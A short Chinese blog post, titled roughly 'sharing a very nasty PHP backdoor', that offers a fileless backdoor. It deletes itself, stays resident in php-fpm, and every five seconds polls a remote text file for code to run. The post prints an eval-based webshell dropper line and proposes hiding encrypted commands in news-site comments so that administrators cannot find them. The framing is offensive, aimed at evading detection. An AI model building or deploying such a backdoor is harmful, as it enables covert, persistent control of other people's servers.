分享一个非常ex的PHP后门


后门的代码第一行删除自身,然后驻留在后台内存里(关于ignore_user_abort函数,百度一下),等待外部链接 在xxx.txt中写入你的后门代码,访问后就会删除自己并循环执行txt的代码 例如txt里面写了一句这样的代码

         file_put_contents('./1.php',"<?php @eval($_POST[cmd])'"?>");  

这样就会在目录下又生成一个木马 如果对方写了是执行命令 。。。 这段代码纯粹变成了一个等待命令的木马。。 而且管理员检查木马文件的时候 都找不到。。。 因为文件已经删除了 木马却注入在php-fpm内sleep(5); 五秒就去远程读取一下指令。。。 ........ 打算将代码修改一下,加一些正则,去163某一篇新闻的评论里读取预先设定的恶意代码。。。hehe。。。 黑客连服务器都省了。。。 黑客只需要去网易新闻评论窗口内写入自己的代码就行 怕别人看懂? 直接加密 采用对称加密算法。。没有秘钥 谁也看不懂啥意思 秘钥在这段后门里面写着 所以非常安全

原创文章采用 CC BY-NC-SA 4.0协议 进行许可,转载请著名转自: 分享一个非常ex的PHP后门

4 评论

  1. spianmo 1月28日 回复

  2. spianmo 2月1日 回复